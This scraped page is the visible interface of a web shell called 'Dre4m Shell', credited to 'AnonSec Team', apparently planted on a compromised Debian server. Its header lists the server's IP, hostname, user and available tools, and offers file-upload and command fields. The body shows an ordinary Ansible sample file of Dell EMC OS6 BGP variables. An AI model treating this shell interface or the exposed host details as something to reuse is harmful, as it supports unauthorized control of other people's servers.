Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 3.144.6.159
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /usr/lib/python3/dist-packages/ansible_collections/dellemc/os6/roles/os6_bgp/tests/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /usr/lib/python3/dist-packages/ansible_collections/dellemc/os6/roles/os6_bgp/tests/main.os6.yaml
---
# vars file for dellemc.os6.os6_bgp,
# below gives a sample configuration
# Sample variables for OS6 device

  os6_bgp:
    asn: 11
    router_id: 1.1.1.1
    maxpath_ibgp: 2
    maxpath_ebgp: 2
    ipv4_network:
      - address: 101.1.2.0 255.255.255.0
        state: present
    ipv6_network:
      - address: 2001:4898:5808:ffa0::/126
        state: present
    neighbor:
      - type: ipv4
        ip: 10.10.234.16
        remote_asn: 64818
        timer: 2 5
        default_originate: True
        peergroup: MUX_HNV_ACCESS
        admin: up
        src_loopback: 2
        src_loopback_state: present
        state: present
      - type: ipv6
        ip: 2001:4898:5808:ffa2::1
        timer: 2 4
        default_originate: True
        ebgp_multihop: 3
        remote_asn: 64818
        peergroup: MUX_HNV_ACCESS
        state: present
      - type: peergroup
        name: MUX_HNV_ACCESS
        timer: 2 4
        ebgp_multihop: 4
        remote_asn: 64918
        subnet: 10.128.5.192/27
        state: present
    redistribute:
      - route_type: connected
        address_type: ipv6
        state: present
    state: present

Anon7 - 2022
AnonSec Team